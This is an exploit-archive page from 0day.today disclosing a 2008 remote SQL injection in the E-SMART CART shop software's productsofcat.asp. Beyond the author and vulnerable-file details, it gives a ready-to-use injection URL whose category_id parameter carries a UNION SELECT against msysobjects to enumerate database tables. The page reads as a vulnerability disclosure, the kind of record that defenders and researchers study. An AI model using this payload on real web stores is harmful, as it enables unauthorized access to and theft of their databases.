[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

E-SMART CART (productsofcat.asp) Remote SQL Injection Vulnerability

Author
JosS
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3173
Category
web applications
Date add
12-06-2008
Platform
unsorted
===================================================================
E-SMART CART (productsofcat.asp) Remote SQL Injection Vulnerability
===================================================================



[+] Info:

[~] Bug found by JosS
[~] EspSeC & Hack0wn!.

[~] Software: E-SMART CART (payment)
[~] HomePage: http://www.preproject.com/
[~] Exploit: Remote SQL Injection [High]
[~] Vuln file: productsofcat.asp

[~] /store/productsofcat.asp?p=1&category_id=[SQL]

[+] Exploit:

[~] http://localhost/PATH/store/productsofcat.asp?p=1&category_id=[SQL]
[~] 22+and+1=2+union+all+select+1,name,3,0+from+msysobjects



#  0day.today [2024-11-15]  #